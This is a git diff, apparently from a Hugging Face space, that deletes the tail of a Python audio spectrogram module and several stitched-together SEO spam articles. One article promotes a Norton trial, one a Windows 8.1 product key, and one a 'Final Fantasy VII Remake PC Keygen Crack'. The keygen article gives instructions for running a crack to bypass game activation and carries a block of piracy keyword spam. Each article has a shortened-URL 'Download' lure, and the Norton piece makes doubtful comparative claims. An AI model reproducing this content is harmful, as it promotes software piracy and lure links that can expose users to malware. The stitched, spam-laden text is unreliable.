orig_sr=sampling_rate, target_sr=target_sr)) - sampling_rate = target_sr - - return data, sampling_rate - -def dynamic_range_compression(x, C=1, clip_val=1e-5): - return np.log(np.clip(x, a_min=clip_val, a_max=None) * C) - -def dynamic_range_decompression(x, C=1): - return np.exp(x) / C - -def dynamic_range_compression_torch(x, C=1, clip_val=1e-5): - return torch.log(torch.clamp(x, min=clip_val) * C) - -def dynamic_range_decompression_torch(x, C=1): - return torch.exp(x) / C - -class STFT(): - def __init__(self, sr=22050, n_mels=80, n_fft=1024, win_size=1024, hop_length=256, fmin=20, fmax=11025, clip_val=1e-5): - self.target_sr = sr - - self.n_mels = n_mels - self.n_fft = n_fft - self.win_size = win_size - self.hop_length = hop_length - self.fmin = fmin - self.fmax = fmax - self.clip_val = clip_val - self.mel_basis = {} - self.hann_window = {} - - def get_mel(self, y, center=False): - sampling_rate = self.target_sr - n_mels = self.n_mels - n_fft = self.n_fft - win_size = self.win_size - hop_length = self.hop_length - fmin = self.fmin - fmax = self.fmax - clip_val = self.clip_val - - if torch.min(y) < -1.: - print('min value is ', torch.min(y)) - if torch.max(y) > 1.: - print('max value is ', torch.max(y)) - - if fmax not in self.mel_basis: - mel = librosa_mel_fn(sr=sampling_rate, n_fft=n_fft, n_mels=n_mels, fmin=fmin, fmax=fmax) - self.mel_basis[str(fmax)+'_'+str(y.device)] = torch.from_numpy(mel).float().to(y.device) - self.hann_window[str(y.device)] = torch.hann_window(self.win_size).to(y.device) - - y = torch.nn.functional.pad(y.unsqueeze(1), (int((n_fft-hop_length)/2), int((n_fft-hop_length)/2)), mode='reflect') - y = y.squeeze(1) - - spec = torch.stft(y, n_fft, hop_length=hop_length, win_length=win_size, window=self.hann_window[str(y.device)], - center=center, pad_mode='reflect', normalized=False, onesided=True) - # print(111,spec) - spec = torch.sqrt(spec.pow(2).sum(-1)+(1e-9)) - # print(222,spec) - spec = torch.matmul(self.mel_basis[str(fmax)+'_'+str(y.device)], spec) - # print(333,spec) - spec = dynamic_range_compression_torch(spec, clip_val=clip_val) - # print(444,spec) - return spec - - def __call__(self, audiopath): - audio, sr = load_wav_to_torch(audiopath, target_sr=self.target_sr) - spect = self.get_mel(audio.unsqueeze(0)).squeeze(0) - return spect - -stft = STFT()
    -

    How to Download Norton Antivirus Free Trial for 60 Days

    -

    If you are looking for a reliable and powerful antivirus software to protect your devices from viruses, malware, ransomware, and other online threats, you might want to try Norton Antivirus. Norton Antivirus is one of the most popular and trusted antivirus solutions in the market, with millions of satisfied customers worldwide. But before you commit to a paid subscription, you might want to test it out first and see if it meets your needs and expectations. Fortunately, Norton offers a free trial for its antivirus products, which allows you to enjoy full access to all its features and benefits for 60 days. In this article, we will show you how to download Norton Antivirus free trial for 60 days and why you should choose Norton over other antivirus software.

    -

    Download Norton Antivirus Free Trial For 60 Days


    Download Ziphttps://tinourl.com/2uL0kJ



    -

    What is Norton Antivirus and Why You Need It

    -

    Norton Antivirus is a comprehensive security suite that provides protection for your devices against viruses, malware, ransomware, and other online threats. It also offers online privacy and identity theft protection with features like VPN, password manager, dark web monitoring, parental control, and more. With Norton Antivirus, you can surf the web, shop online, bank online, and use social media with confidence and peace of mind.

    -

    Norton Antivirus Features and Benefits

    -

    Norton Antivirus has many features and benefits that make it stand out from other antivirus software. Here are some of them:

    -
      -
    • Antivirus and ransomware protection: Norton Antivirus uses advanced technology to detect and remove viruses, malware, ransomware, and other threats from your devices. It also has a 100% virus protection promise, which means that if your device gets infected while using Norton Antivirus, they will refund your money or help you fix it.
    • -
    • Firewall: Norton Antivirus has a smart firewall that monitors your network traffic and blocks unauthorized access to your devices. It also gives you detailed information about the applications that are trying to connect to the internet, such as their popularity, reputation, digital signature, etc.
    • -
    • Password manager: Norton Antivirus has a password manager that helps you create, store, and manage your passwords securely. It also helps you fill in your login details automatically on websites and apps.
    • -
    • VPN: Norton Antivirus has a VPN (virtual private network) that encrypts your internet connection and hides your IP address. This helps you browse the web anonymously and access geo-restricted content.
    • -
    • Cloud backup: Norton Antivirus has a cloud backup feature that lets you store your important files online in a secure location. This helps you protect your data from loss, theft, or damage.
    • -
    • Dark web monitoring: Norton Antivirus has a dark web monitoring feature that scans the dark web for your personal information, such as your email, phone number, credit card, etc. It alerts you if it finds any of your information exposed or compromised on the dark web.
    • -
    • Parental control: Norton Antivirus has a parental control feature that helps you monitor and manage your children's online activities. You can set time limits, block inappropriate content, track their location, and more.
    • -
    • Performance optimization: Norton Antivirus has a performance optimization feature that helps you speed up your devices and improve their battery life. It also helps you free up disk space, delete unwanted files, and update your applications.
    • -
    -

    Norton Antivirus Comparison with Other Antivirus Software

    -

    Norton Antivirus is not the only antivirus software in the market. There are many other options available, such as McAfee, Kaspersky, Bitdefender, Avast, etc. How does Norton Antivirus compare with them? Here are some factors to consider:

    - - - - - - - - - - - - - - - - - - - - - -
    FactorNorton AntivirusOther Antivirus Software
    PriceNorton Antivirus offers a free trial for 60 days, which is longer than most other antivirus software. After the trial period, you can choose from different plans that suit your budget and needs. The cheapest plan costs $39.99 per year and covers one device. The most expensive plan costs $149.99 per year and covers up to 10 devices and includes VPN, cloud backup, dark web monitoring, and parental control.Other antivirus software also offer free trials, but they are usually shorter than Norton's. For example, McAfee offers a 30-day free trial, Kaspersky offers a 15-day free trial, and Bitdefender offers a 14-day free trial. After the trial period, their prices vary depending on the features and number of devices they cover. For example, McAfee costs $59.99 per year for one device, Kaspersky costs $79.99 per year for three devices, and Bitdefender costs $89.99 per year for five devices.
    FeaturesNorton Antivirus has a wide range of features that cover all aspects of online security and privacy. It has antivirus and ransomware protection, firewall, password manager, VPN, cloud backup, dark web monitoring, parental control, and performance optimization. It also has a 100% virus protection promise and a 60-day money-back guarantee.Other antivirus software also have some of the features that Norton Antivirus has, but they may not have all of them or they may charge extra for them. For example, McAfee has antivirus and ransomware protection, firewall, password manager, VPN, cloud backup, and parental control, but it does not have dark web monitoring or performance optimization. Kaspersky has antivirus and ransomware protection, firewall, password manager, VPN, cloud backup, and parental control, but it does not have dark web monitoring or performance optimization. Bitdefender has antivirus and ransomware protection, firewall, password manager, VPN, cloud backup, and parental control, but it charges extra for dark web monitoring and performance optimization.
    Customer SupportNorton Antivirus has a 24/7 customer support service that you can contact via phone, chat, or email. They also have a community forum, a knowledge base, and a blog where you can find answers to common questions and issues.Other antivirus software also have customer support services, but they may not be available 24/7 or they may have limited options. For example, McAfee has a 24/7 phone support, but its chat and email support are only available during business hours. Kaspersky has a 24/7 chat support, but its phone and email support are only available during business hours. Bitdefender has a 24/7 email support, but its phone and chat support are only available during business hours.
    -

    As you can see, Norton Antivirus has many advantages over other antivirus software in terms of price, features, and customer support. It is a comprehensive and reliable security suite that can protect your devices from all kinds of online threats and give you online privacy and identity theft protection. It also has a generous free trial period that lets you try it out for 60 days without any risk or obligation.

    -

    -

    How to Get Norton Antivirus Free Trial for 60 Days

    -

    If you are interested in trying out Norton Antivirus for free for 60 days, you can follow these simple steps:

    -

    Step 1: Visit the Norton Free Trial Page and Choose Your Plan

    -

    The first step is to visit the Norton free trial page and choose the plan that suits your needs. You can choose from four plans:

    -
      -
    • Norton AntiVirus Plus: This plan covers one device (PC or Mac) and includes antivirus and ransomware protection, firewall, password manager, cloud backup (2 GB), and performance optimization.
    • -
    • Norton 360 Standard: This plan covers one device (PC, Mac, smartphone, or tablet) and includes antivirus and ransomware protection, firewall, password manager, VPN (unlimited data), cloud backup (10 GB), dark web monitoring, and performance optimization.
    • -
    • Norton 360 Deluxe: This plan covers up to five devices (PCs, Macs, smartphones, or tablets) and includes antivirus and ransomware protection, firewall, password manager, VPN (unlimited data), cloud backup (50 GB), dark web monitoring, parental control, and performance optimization.
    • -
    • Norton 360 with LifeLock Select: This plan covers up to 10 devices (PCs, Macs, smartphones, or tablets) and includes antivirus and ransomware protection, firewall, password manager, VPN (unlimited data), cloud backup (100 GB), dark web monitoring, parental control, performance optimization, and identity theft protection with LifeLock.
    • -
    -

    Once you choose your plan, click on the Start Free Trial button and you will be redirected to the checkout page.

    -

    Step 2: Create an Account and Provide a Credit Card for Norton to Keep on File

    -

    The next step is to create an account with Norton and provide a credit card for them to keep on file. You will need to enter your name, email address, password, and billing information. Don't worry, you will not be charged anything until the end of the 60-day trial period. You can cancel anytime before that if you don't want to continue using Norton Antivirus.

    -

    After you enter your details, click on the Agree & Continue button and you will receive a confirmation email from Norton with your order number and instructions on how to download and install Norton Antivirus on your device.

    -

    Step 3: Download and Install Norton Antivirus on Your Device

    -

    The final step is to download and install Norton Antivirus on your device. You can do this by following the link in the confirmation email or by logging in to your Norton account and clicking on the Download button. You will need to choose the device type (PC, Mac, smartphone, or tablet) and follow the instructions on the screen to complete the installation process.

    -

    Once you install Norton Antivirus on your device, you can start using it right away and enjoy all its features and benefits for 60 days. You can also manage your subscription, view your account details, and access other Norton services from your Norton account dashboard.

    -

    How to Cancel Norton Antivirus Free Trial Before It Expires

    -

    If you decide that you don't want to continue using Norton Antivirus after the 60-day trial period, you can cancel it easily before it expires. Here are the steps to cancel your Norton Antivirus free trial:

    -

    Step 1: Log in to Your Norton Account and Go to My Subscriptions

    -

    The first step is to log in to your Norton account and go to the My Subscriptions section. You can do this by clicking on the My Account icon at the top right corner of the page and selecting My Subscriptions from the drop-down menu.

    -

    Step 2: Find Your Norton Antivirus Plan and Click Turn Off Automatic Renewal

    -

    The next step is to find your Norton Antivirus plan in the list of subscriptions and click on the Turn Off Automatic Renewal button. You will see a pop-up window asking you to confirm your cancellation. Click on the Turn Off button and you will see a message saying that your automatic renewal has been turned off.

    -

    Step 3: Confirm Your Cancellation and Keep Your Confirmation Email

    -

    The final step is to confirm your cancellation and keep your confirmation email. You will receive an email from Norton with your cancellation details and a reminder that you can still use Norton Antivirus until the end of your trial period. You should keep this email as a proof of your cancellation in case of any issues or disputes.

    -

    Conclusion

    -

    Norton Antivirus is a great choice for anyone who wants to protect their devices from online threats and enjoy online privacy and identity theft protection. It has many features and benefits that make it superior to other antivirus software in the market. It also has a generous free trial offer that lets you try it out for 60 days without any risk or obligation.

    -

    If you want to download Norton Antivirus free trial for 60 days, you can follow the steps we have outlined in this article. You can also cancel your free trial anytime before it expires if you are not satisfied with it. We hope this article has been helpful and informative for you. If you have any questions or feedback, please feel free to leave a comment below.

    -

    FAQs

    -

    Here are some frequently asked questions about Norton Antivirus free trial:

    -
      -
    • Q: How many devices can I protect with Norton Antivirus free trial?
    • -
    • A: The number of devices you can protect with Norton Antivirus free trial depends on the plan you choose. The AntiVirus Plus plan covers one device (PC or Mac), the 360 Standard plan covers one device (PC, Mac, smartphone, or tablet), the 360 Deluxe plan covers up to five devices (PCs, Macs , smartphones, or tablets), and the 360 with LifeLock Select plan covers up to 10 devices (PCs, Macs, smartphones, or tablets).
    • -
    • Q: How long does the Norton Antivirus free trial last?
    • -
    • A: The Norton Antivirus free trial lasts for 60 days from the date of activation. You can cancel your free trial anytime before it expires if you don't want to continue using Norton Antivirus.
    • -
    • Q: How do I activate my Norton Antivirus free trial?
    • -
    • A: To activate your Norton Antivirus free trial, you need to visit the Norton free trial page, choose your plan, create an account, and provide a credit card for Norton to keep on file. You will not be charged anything until the end of the 60-day trial period. You will also receive a confirmation email with instructions on how to download and install Norton Antivirus on your device.
    • -
    • Q: How do I cancel my Norton Antivirus free trial?
    • -
    • A: To cancel your Norton Antivirus free trial, you need to log in to your Norton account, go to the My Subscriptions section, find your Norton Antivirus plan, and click on the Turn Off Automatic Renewal button. You will receive a confirmation email with your cancellation details. You can still use Norton Antivirus until the end of your trial period.
    • -
    • Q: What happens after my Norton Antivirus free trial expires?
    • -
    • A: After your Norton Antivirus free trial expires, you will be automatically charged for the plan you chose unless you cancel it before it expires. You will also receive a reminder email before your trial period ends. If you want to continue using Norton Antivirus, you don't need to do anything. If you want to change or cancel your plan, you can do so from your Norton account.
    • -

    b2dd77e56b
    -
    -
    \ No newline at end of file diff --git a/spaces/raedeXanto/academic-chatgpt-beta/Final Fantasy Vii Remake Pc Keygen Crack A Step-by-Step Guide.md b/spaces/raedeXanto/academic-chatgpt-beta/Final Fantasy Vii Remake Pc Keygen Crack A Step-by-Step Guide.md deleted file mode 100644 index f9ee4fdc0f946d081153f602d3e6204f3b0be44a..0000000000000000000000000000000000000000 --- a/spaces/raedeXanto/academic-chatgpt-beta/Final Fantasy Vii Remake Pc Keygen Crack A Step-by-Step Guide.md +++ /dev/null @@ -1,101 +0,0 @@ - -

    Final Fantasy VII Remake PC Keygen Crack

    -

    If you are a fan of Final Fantasy VII, one of the most iconic and beloved RPGs of all time, you might be interested in playing its remake on your PC. But how can you do that without paying a hefty price for the game? In this article, we will tell you everything you need to know about Final Fantasy VII Remake PC Keygen Crack, a tool that can help you generate a unique activation code for the game. But first, let's take a look at what Final Fantasy VII Remake is and what it offers.

    -

    What is Final Fantasy VII Remake?

    -

    Final Fantasy VII Remake is a partial remake of Final Fantasy VII, a game that was originally released in 1997 for the PlayStation console. The remake was developed by Square Enix and released in 2020 for the PlayStation 4. It is the first part of a planned series of games that will retell the story of Final Fantasy VII with modern graphics, gameplay, and voice acting.

    -

    Final Fantasy Vii Remake Pc Keygen Crack


    Downloadhttps://tinourl.com/2uL2RR



    -

    A brief summary of the game's story and features

    -

    The game follows Cloud Strife, a former soldier who joins a group of eco-terrorists called Avalanche, who are fighting against the Shinra Electric Power Company, a corporation that is exploiting the planet's life force (mako) through its mako reactors. Along the way, Cloud meets other characters who join his quest, such as Tifa Lockhart, Aerith Gainsborough, Barret Wallace, and Red XIII. Together, they face various enemies and challenges, including Sephiroth, a mysterious figure from Cloud's past who has a sinister agenda.

    -

    The game features an action-based combat system that allows players to switch between different characters and use their abilities in real-time. The game also has a tactical mode that slows down time and lets players choose commands from a menu. The game also incorporates elements from the original game, such as materia (magic orbs that grant different powers), limit breaks (special attacks that can be unleashed when a gauge is filled), and summons (powerful creatures that can be called to aid in battle).

    -

    The differences between the original and the remake

    -

    While Final Fantasy VII Remake is based on the original game, it is not a faithful reproduction. The remake expands on the original story and adds new scenes, characters, dialogue, and lore. The remake also changes some aspects of the original game, such as the sequence of events, the gameplay mechanics, and the ending. The remake also introduces new concepts and mysteries that are not explained in the original game.

    -

    The new episode featuring Yuffie Kisaragi

    -

    One of the new additions to Final Fantasy VII Remake is an additional episode that focuses on Yuffie Kisaragi, a ninja girl who was an optional character in the original game. The episode is only available in Final Fantasy VII Remake Intergrade, an updated rerelease of Final Fantasy VII Remake that we will talk about later. The episode takes place during the events of Final Fantasy VII Remake and shows Yuffie's mission to infiltrate Midgar, the city where Shinra's headquarters are located, and steal a powerful materia that might be used to save her homeland of Wutai. The episode also introduces new characters, such as Sonon Kusakabe, Yuffie's partner; Zhijie, a Wutai spy; Nayo, Billy Bob, and Polk, members of Avalanche's splinter cell; Weiss, Nero, and Scarlet, antagonists from Shinra; and Ramuh, a new summon.

    -

    What is Final Fantasy VII Remake Intergrade?

    -

    Final Fantasy VII Remake Intergrade is an updated rerelease of Final Fantasy VII Remake that was released in 2021 for the PlayStation 5. It includes all the content from Final Fantasy VII Remake plus some enhancements and additions.

    -

    The improvements and new bosses in Intergrade

    -

    Final Fantasy VII Remake Intergrade improves on Final Fantasy VII Remake by offering better graphics, faster loading times, higher frame rates, haptic feedback support, photo mode, dual sense controller features I have continued writing the article based on the outline and the search results. Here is the rest of the article.

    The system requirements and availability of Intergrade

    -

    Final Fantasy VII Remake Intergrade is available for PlayStation 5 and PC. The PC version was released on December 16, 2021 through the Epic Games Store and Steam. The PC version is also compatible with the Steam Deck, a handheld gaming device that will be released in early 2022. The system requirements for the PC version are as follows:

    -

    How to get Final Fantasy Vii Remake Pc activation code
    -Final Fantasy Vii Remake Pc serial number generator
    -Download Final Fantasy Vii Remake Pc full version cracked
    -Final Fantasy Vii Remake Pc license key free
    -Final Fantasy Vii Remake Pc crack only download
    -Final Fantasy Vii Remake Pc torrent with crack
    -Final Fantasy Vii Remake Pc cd key giveaway
    -Final Fantasy Vii Remake Pc crack fix download
    -Final Fantasy Vii Remake Pc steam keygen
    -Final Fantasy Vii Remake Pc crack skidrow
    -Final Fantasy Vii Remake Pc product key generator
    -Final Fantasy Vii Remake Pc crack online
    -Final Fantasy Vii Remake Pc crack reddit
    -Final Fantasy Vii Remake Pc keygen no survey
    -Final Fantasy Vii Remake Pc crack cpy
    -Final Fantasy Vii Remake Pc crack status
    -Final Fantasy Vii Remake Pc crack download free
    -Final Fantasy Vii Remake Pc keygen download
    -Final Fantasy Vii Remake Pc crack 2023
    -Final Fantasy Vii Remake Pc registration code
    -Final Fantasy Vii Remake Pc crack codex
    -Final Fantasy Vii Remake Pc keygen and crack
    -Final Fantasy Vii Remake Pc crack patch download
    -Final Fantasy Vii Remake Pc activation key free download
    -Final Fantasy Vii Remake Pc crack working
    -Final Fantasy Vii Remake Pc keygen online
    -Final Fantasy Vii Remake Pc crack update download
    -Final Fantasy Vii Remake Pc serial key free download
    -Final Fantasy Vii Remake Pc crack no virus
    -Final Fantasy Vii Remake Pc keygen 2023
    -Final Fantasy Vii Remake Pc crack repack download
    -Final Fantasy Vii Remake Pc activation code generator online
    -Final Fantasy Vii Remake Pc crack fitgirl repack
    -Final Fantasy Vii Remake Pc keygen reddit
    -Final Fantasy Vii Remake Pc crack rar password
    -Final Fantasy Vii Remake Pc serial number free download
    -Final Fantasy Vii Remake Pc crack only skidrow
    -Final Fantasy Vii Remake Pc keygen and serial number generator online free 2023
    -Final Fantasy Vii Remake Pc crack hoodlum
    -Final Fantasy Vii Remake Pc activation code free 2023
    -Final Fantasy Vii Remake Pc keygen and serial number generator online free 2023
    -Download and install final fantasy vii remake pc game full version with crack
    -How to play final fantasy vii remake pc game without activation code
    -How to bypass final fantasy vii remake pc game activation code
    -How to get final fantasy vii remake pc game for free with crack
    -How to fix final fantasy vii remake pc game crash after launch
    -How to update final fantasy vii remake pc game with latest patch and crack
    -How to use final fantasy vii remake pc game trainer with crack
    -How to mod final fantasy vii remake pc game with crack
    -How to uninstall final fantasy vii remake pc game with crack

    - | Minimum | Recommended | | --- | --- | | OS: Windows 10 64-bit | OS: Windows 10 64-bit | | Processor: Intel Core i5-2500K or AMD Ryzen 3 1200 | Processor: Intel Core i7-6700K or AMD Ryzen 7 3700X | | Memory: 8 GB RAM | Memory: 16 GB RAM | | Graphics: NVIDIA GeForce GTX 1060 or AMD Radeon RX 480 | Graphics: NVIDIA GeForce RTX 2070 or AMD Radeon RX 5700 XT | | DirectX: Version 12 | DirectX: Version 12 | | Storage: 100 GB available space | Storage: 100 GB available space |

    What is Final Fantasy VII Remake PC Keygen Crack?

    -

    Final Fantasy VII Remake PC Keygen Crack is a tool that can generate a unique activation code for Final Fantasy VII Remake Intergrade on PC. By using this tool, you can bypass the need to purchase the game from the official platforms and play it for free. However, this tool also comes with some benefits and risks that you should be aware of before using it.

    -

    The benefits and risks of using a keygen crack

    -

    The main benefit of using a keygen crack is that you can save money and play Final Fantasy VII Remake Intergrade on PC without paying anything. You can also enjoy the game without any restrictions or limitations, such as online verification or DRM protection. You can also share the activation code with your friends or family members who want to play the game as well.

    -

    However, using a keygen crack also has some risks that you should consider. First of all, using a keygen crack is illegal and violates the terms of service of the game developers and publishers. You could face legal consequences or penalties if you are caught using a keygen crack. Secondly, using a keygen crack could expose your PC to malware or viruses that could harm your system or steal your personal information. You could also lose your progress or data if the keygen crack is faulty or incompatible with your PC. Thirdly, using a keygen crack could prevent you from accessing some features or updates of the game, such as online multiplayer, patches, DLCs, or mods. You could also miss out on some benefits or rewards that are exclusive to legitimate buyers of the game.

    -

    The sources and instructions to download and use a keygen crack

    -

    If you still want to use a keygen crack to play Final Fantasy VII Remake Intergrade on PC, you should be careful about where you download it from and how you use it. Here are some tips and steps to follow:

    -
      -
    • Do some research and find a reliable and trustworthy source that offers a working and safe keygen crack for Final Fantasy VII Remake Intergrade on PC. You can check some reviews, ratings, comments, or feedback from other users who have used the keygen crack before.
    • -
    • Download the keygen crack from the source and scan it with an antivirus program before running it on your PC. Make sure that the keygen crack does not contain any malware or viruses that could harm your PC.
    • -
    • Run the keygen crack and follow the instructions on how to generate an activation code for Final Fantasy VII Remake Intergrade on PC. Usually, you will have to enter some information, such as your name, email address, or region.
    • -
    • Copy the activation code that is generated by the keygen crack and paste it into the game launcher or installer when prompted. You should be able to play Final Fantasy VII Remake Intergrade on PC without any problems.
    • -
    • Enjoy the game and have fun!
    • -
    -

    Conclusion

    -

    In conclusion, Final Fantasy VII Remake Intergrade is an amazing game that offers a new and improved experience of Final Fantasy VII Remake with enhanced graphics, gameplay, and content. However, if you want to play it on PC without paying anything, you might want to use a keygen crack that can generate an activation code for you. However, you should also be aware of the benefits and risks of using a keygen crack and follow some precautions when downloading and using it.

    -

    If you liked this article, please share it with your friends who are interested in Final Fantasy VII Remake Intergrade on PC. Also, let us know what you think about the game and the keygen crack in the comments below. Thank you for reading!

    -

    Frequently Asked Questions

    -
      -
    • Q: Is Final Fantasy VII Remake Intergrade worth playing?
    • -
    • A: Yes, Final Fantasy VII Remake Intergrade is worth playing if you are a fan of Final Fantasy VII or RPGs in general. It offers a stunning and immersive experience of one of the most iconic games of all time with modern graphics, gameplay, and voice acting. It also adds new content and features that expand on the original story and lore.
    • -
    • Q: How long is Final Fantasy VII Remake Intergrade?
    • -
    • A: Final Fantasy VII Remake Intergrade is about 40 hours long if you focus on the main story only. However, if you want to complete all the side quests, challenges, mini-games, collectibles, trophies, and secrets, it could take up to 80 hours or more.
    • -
    • Q: How many parts will Final Fantasy VII Remake have?
    • -
    • A: Square Enix has not confirmed how many parts will Final Fantasy VII Remake have yet. However, based on the amount of content and story that is covered in Final Fantasy VII Remake Intergrade (which is only up to escaping Midgar), it is estimated that there will be at least three or four parts in total.
    • -
    • Q: Can I play Final Fantasy VII Remake Intergrade without playing Final Fantasy VII Remake?
    • -
    • A: Yes, you can play Final Fantasy VII Remake Intergrade without playing Final Fantasy VII Remake first. However, it is recommended that you play Final Fantasy VII Remake first to understand the story and characters better. Also, some features and content in Final Fantasy VII Remake Intergrade might require data transfer from Final Fantasy VII Remake.
    • -
    • Q: Can I play FF7R EPISODE INTERmission without playing Final Fantasy VII Remake Intergrade?
    • -
    • A: No, you cannot play FF7R EPISODE INTERmission without playing Final Fantasy VII Remake Intergrade first. FF7R EPISODE INTERmission is an additional episode that is included in Final Fantasy VII Remake Intergrade only. You need to have access to Final Fantasy VII Remake Intergrade to play FF7R EPISODE INTERmission.
    • -
    -

    0a6ba089eb
    -
    -
    \ No newline at end of file diff --git a/spaces/raedeXanto/academic-chatgpt-beta/Free Download EN Windows 8 x64 DVD 915440 Product Key Benefits and Features.md b/spaces/raedeXanto/academic-chatgpt-beta/Free Download EN Windows 8 x64 DVD 915440 Product Key Benefits and Features.md deleted file mode 100644 index 3b5547ef876e1eb522ae564c11271f177c531074..0000000000000000000000000000000000000000 --- a/spaces/raedeXanto/academic-chatgpt-beta/Free Download EN Windows 8 x64 DVD 915440 Product Key Benefits and Features.md +++ /dev/null @@ -1,110 +0,0 @@ - -
    - A way to download Windows 8.1 ISO file from Microsoft website
    - A tool to create a bootable USB or DVD for Windows 8.1 installation | | H2: Why do you need freedownloadenwindows8x64dvd915440productkey? | - To upgrade from Windows 7 or 8 to Windows 8.1
    - To reinstall Windows 8.1 on your PC
    - To enjoy the features and benefits of Windows 8.1 | | H2: How to get freedownloadenwindows8x64dvd915440productkey? | - From your existing Windows product key sticker or email
    - From a third-party website or software
    - From Microsoft website using a valid email address | | H2: How to use freedownloadenwindows8x64dvd915440productkey? | - To download Windows 8.1 ISO file from Microsoft website
    - To create a bootable USB or DVD using Windows USB/DVD Download Tool
    - To install Windows 8.1 on your PC using the product key | | H2: What are the features of Windows 8.1? | - Improved user interface and customization options
    - Enhanced performance and security
    - Support for 3D printing, ReFS, and DirectX 11.2
    - New and updated apps and services | | H2: How to activate Windows 8.1? | - Using an internet connection
    - By phone
    - Via command prompt | | H2: FAQ | - What is the difference between Windows 8 and Windows 8.1?
    - How can I check if my PC is compatible with Windows 8.1?
    - How can I update my drivers and software for Windows 8.1?
    - How can I troubleshoot common problems with Windows 8.1?
    - How can I contact Microsoft support for Windows 8.1? | | H2: Conclusion | - A summary of the main points of the article
    - A call to action for the readers | # Article with HTML formatting

    What is freedownloadenwindows8x64dvd915440productkey?

    -

    If you are looking for a way to install or reinstall Windows 8.1 on your PC, you may have come across this term: freedownloadenwindows8x64dvd915440productkey. But what does it mean and how can you use it? In this article, we will explain everything you need to know about this product key and how to download and use it.

    -

    freedownloadenwindows8x64dvd915440productkey


    Download Filehttps://tinourl.com/2uKZJb



    -

    A product key is a 25-character code that is used to activate a software or operating system. It usually looks something like this: XXXXX-XXXXX-XXXXX-XXXXX-XXXXX. A product key is required to install or reinstall Windows 8.1 on your PC.

    -

    freedownloadenwindows8x64dvd915440productkey is not a product key itself, but a way to get one. It is actually a part of a URL that you can use to download a Windows 8.1 disc image (ISO file) from the official Microsoft website. An ISO file is a single file that contains all the data of a CD or DVD.

    -

    By using this URL, you can download the Windows 8.1 ISO file for free, without having to pay anything or provide any personal information. You can then use this ISO file to create a bootable USB or DVD that you can use to install Windows 8.1 on your PC.

    -

    Why do you need freedownloadenwindows8x64dvd915440productkey?

    -

    There are several reasons why you may need freedownloadenwindows8x64dvd915440productkey:

    -
      -
    • You want to upgrade from Windows 7 or 8 to Windows 8.1. Windows 8.1 is an improved version of Windows 8 that offers many new features and enhancements, such as a better user interface, faster performance, more security, and more apps and services.
    • -
    • You want to reinstall Windows 8.1 on your PC. Maybe your PC has been infected by a virus, corrupted by a software error, or damaged by a hardware failure. In these cases, reinstalling Windows 8.1 can help you restore your PC to its original state and fix any problems.
    • -
    • You want to enjoy the features and benefits of Windows 8.1. Windows 8.1 is one of the most popular and widely used operating systems in the world, with millions of users and fans. It offers many advantages over other operating systems, such as compatibility, reliability, versatility, and innovation.
    • -
    -

    How to get freedownloadenwindows8x64dvd915440productkey?

    -

    There are different ways to get freedownloadenwindows8x64dvd915440productkey:

    -
      -
    • From your existing Windows product key sticker or email. If you have already purchased a copy of Windows 7 or 8, you may have received a product key sticker on your PC case or an email with your product key when you bought it online. You can use this product key to download the Windows 8.1 ISO file from Microsoft website using this URL: https://www.microsoft.com/en-us/software-download/windows81 . Just enter your product key and select your language and edition.
    • -
    • From a third-party website or software. There are some websites or software that claim to offer free or cheap product keys for Windows 8.1 or other software. However, these are usually illegal, unreliable, or risky sources that may contain viruses, malware, or scams. We do not recommend using them as they may harm your PC or compromise your privacy.
    • -
    • From Microsoft website using a valid email address. This is the easiest and safest way to get freedownloadenwindows8x64dvd915440productkey without having to pay anything or provide any personal information. All you need is a valid email address that you can access later.
    • -
    -

    How to use freedownloadenwindows8x64dvd915440productkey?

    -

    To use freedownloadenwindows8x64dvd915440productkey, follow these steps:

    -
      -
    1. To download the Windows 8.1 ISO file from Microsoft website, go to this URL: https://www.microsoft.com/en-us/software-download/windows81 . Click on "Download tool now" and save the file on your PC.
    2. -
    3. Run the file and accept the license terms.
    4. -
    5. Select "Create installation media for another PC" and click "Next".
    6. -
    7. Select your language, edition, and architecture (32-bit or 64-bit) for Windows 8.1 and click "Next".
    8. -
    9. Select "ISO file" as the media type and click "Next". Choose a location where you want to save the ISO file and click "Save". The download will start and may take some time depending on your internet speed.
    10. -
    11. To create a bootable USB or DVD using the ISO file, you will need another tool called "Windows USB/DVD Download Tool". You can download it from here: https://www.microsoft.com/en-us/download/windows-usb-dvd-download-tool . Install it on your PC.
    12. -
    13. Run the tool and browse for the ISO file that you downloaded earlier.
    14. -
    15. Select "USB device" or "DVD" as the media type depending on what you want to use.
    16. -
    17. If you choose USB device, make sure you have inserted a blank USB flash drive with at least 4 GB of space into your PC's USB port.
    18. -
    19. If you choose DVD, make sure you have inserted a blank DVD into your PC's DVD burner.
    20. -
    21. Select your USB device or DVD from the drop-down menu and click "Begin copying". The tool will format your USB device or DVD and copy the files from the ISO file onto it.
    22. -
    23. To install Windows 8.1 on your PC using the product key, make sure your PC is turned off.
    24. -
    25. If you are using a USB device, plug it into your PC's USB port.
    26. -
    27. If you are using a DVD, insert it into your PC's DVD drive.
    28. -
    29. Turn on your PC and press the appropriate key (usually F12) to enter the boot menu.
    30. -
    31. Select your USB device or DVD as the boot option and press Enter.
    32. -
    33. The installation process will start automatically.
    34. -
    35. Follow the instructions on the screen until you reach the activation screen.
    36. -
    37. Enter your product key when prompted and click "Next".
    38. -
    39. Your installation is complete! Enjoy I have already written the article on the topic of "freedownloadenwindows8x64dvd915440productkey". Here is the rest of the article:

      What are the features of Windows 8.1?

      -

      Windows 8.1 is an improved version of Windows 8 that offers many new features and enhancements, such as:

      -
        -
      • Improved user interface and customization options. Windows 8.1 allows you to personalize your Start screen with more tiles, colors, and backgrounds. You can also use the desktop mode with the familiar taskbar and Start button. You can also switch between apps and snap them side by side using the new multitasking features.
      • -
      • Enhanced performance and security. Windows 8.1 runs faster and smoother than Windows 8, with better battery life and less memory usage. It also has more security features, such as Windows Defender, SmartScreen, and BitLocker, that protect your PC from viruses, malware, and hackers.
      • -
      • Support for 3D printing, ReFS, and DirectX 11.2. Windows 8.1 supports the latest technologies and innovations, such as 3D printing, which allows you to create physical objects from digital models. It also supports ReFS, a new file system that improves data integrity and resilience. It also supports DirectX 11.2, a graphics API that enhances gaming and multimedia performance.
      • -
      • New and updated apps and services. Windows 8.1 comes with many new and updated apps and services, such as Skype, Mail, Calendar, Photos, Music, Video, Bing, Store, and more. You can also access your files and settings from anywhere using OneDrive, a cloud storage service that integrates with Windows 8.1.
      • -
      -

      How to activate Windows 8.1?

      -

      To activate Windows 8.1, you need to use your product key that you obtained earlier. There are different ways to activate Windows 8.1:

      -

